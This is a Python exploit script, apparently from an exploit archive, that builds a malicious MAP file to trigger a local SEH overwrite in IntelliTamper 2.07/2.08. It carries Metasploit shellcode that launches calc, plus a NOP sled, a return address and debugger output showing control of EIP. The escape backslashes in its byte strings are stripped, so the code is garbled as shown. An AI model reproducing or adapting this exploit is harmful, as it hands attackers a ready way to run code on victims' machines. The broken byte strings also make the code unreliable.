#!/usr/bin/python
# IntelliTamper 2.07/2.08  (MAP File) 0-day Local SEH Overwrite Exploit
# Bug discovered by cN4phux <cN4phux@gmail.com>
# Tested on: IntelliTamper 2.07/2.08 / win32 SP3 FR
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Here's the debugger output like what u see, the EIP overwritten & attempt to read from address 41414141 so the prog must be crashz . .
# EAX 0015B488 ECX 00123400 EDX 00123610
# EBX 00000000 ESP 00123604 EBP 00128B78
# ESI 00000000 EDI 00123A64 EIP 41414141
#Vive les Algeriens & greatz to friend's : me (XD) Heurs, Djug , Blub , His0k4 , Knuthy , Moorish , Ilyes ,
#Here's the the Poc :


import sys
map_theader = ((("x23x23x23x20x53x49x54x45x4D"
                 "x41x50x31x20x49x4Ex54x45x4C"
                 "x4Cx49x54x41x4Dx50x45x52x0Dx0A"))) #junk

map_iheader = "x46x49x4Cx45x23x23"

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = ((("x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc5"
               "x91xc1x60x83xebxfcxe2xf4x39x79x85x60xc5x91x4ax25"
               "xf9x1axbdx65xbdx90x2exebx8ax89x4ax3fxe5x90x2ax29"
               "x4exa5x4ax61x2bxa0x01xf9x69x15x01x14xc2x50x0bx6d"
               "xc4x53x2ax94xfexc5xe5x64xb0x74x4ax3fxe1x90x2ax06"
               "x4ex9dx8axebx9ax8dxc0x8bx4ex8dx4ax61x2ex18x9dx44"
               "xc1x52xf0xa0xa1x1ax81x50x40x51xb9x6cx4exd1xcdxeb"
               "xb5x8dx6cxebxadx99x2ax69x4ex11x71x60xc5x91x4ax08"
               "xf9xcexf0x96xa5xc7x48x98x46x51xbax30xadx61x4bx64"
               "x9axf9x59x9ex4fx9fx96x9fx22xf2xa0x0cxa6x91xc1x60"))); # 160 byte

header_nop = "x90"*327

retn = "x7bx34x12x00"+".htmln" # EIP value with 4 byte fix

exploit = map_theader + map_iheader + header_nop + shellcode + retn
headers = open("0x.map", "w")
headers.write(exploit)
headers.close()

print "nFile created successfully !";
print "ncN4phux.";

# www.Syue.com [2008-12-28]